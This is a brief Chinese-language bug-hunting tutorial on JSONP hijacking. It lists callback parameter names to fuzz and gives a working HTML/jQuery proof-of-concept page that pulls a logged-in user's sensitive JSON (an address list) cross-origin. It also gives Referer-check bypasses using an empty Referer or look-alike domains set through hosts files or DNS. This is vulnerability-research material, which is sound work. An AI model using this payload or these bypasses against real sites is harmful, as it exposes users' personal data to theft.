0x00 介绍

平常挖洞的时候,会遇到大量的json数据的格式,其中包含了用户的敏感信息

当然一般评级是:中低危

0x01 挖掘方式

(1)burp 拦截所有的数据包,在历史流量里直接搜索jsonp、callback等关键字

z.png

(2)jsonp fuzz

当遇到json数据返回的时候,且包含敏感信息:如姓名、手机号、身份证、银行卡等等信息时

但原本请求并不是jsonp的请求,因为开发者可能为了方便会预留接口

callback=attack 

cb=attack 

call=attack 

jsonp=attack 

jsonpcallback=attack 

jsonpcb=attack 

json=attack 

jsoncallback=attack 

jcb=attack

0x02 利用payload



<html>
<head>
    <title>跨域测试</title>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.js"></script>
    <script>
        $(document).ready(function () {       
                $.ajax({
                    url: "https://www.xxxx.com/apic/user/address/list?type=1",
                    type: "GET",
                    dataType: "jsonp", //指定服务器返回的数据类型
                    success: function (data) {
                        var result = JSON.stringify(data); //json对象转成字符串
                        $("#text").val(result);
                    }
                });
        });
    </script>
</head>
<body>
    <textarea id="text" style="width: 400px; height: 100px;"></textarea>
</body>
</html>
0x03绕过reffer检测


设置reffer为空、或者通过baidu.com.xxx.com 来绕过

(1)修改本地的hosts文件 baidu.com.xxx.com 127.0.0.1

(2)通过修改在线的dns解析 baidu.com.xxx.com 118.118.118.118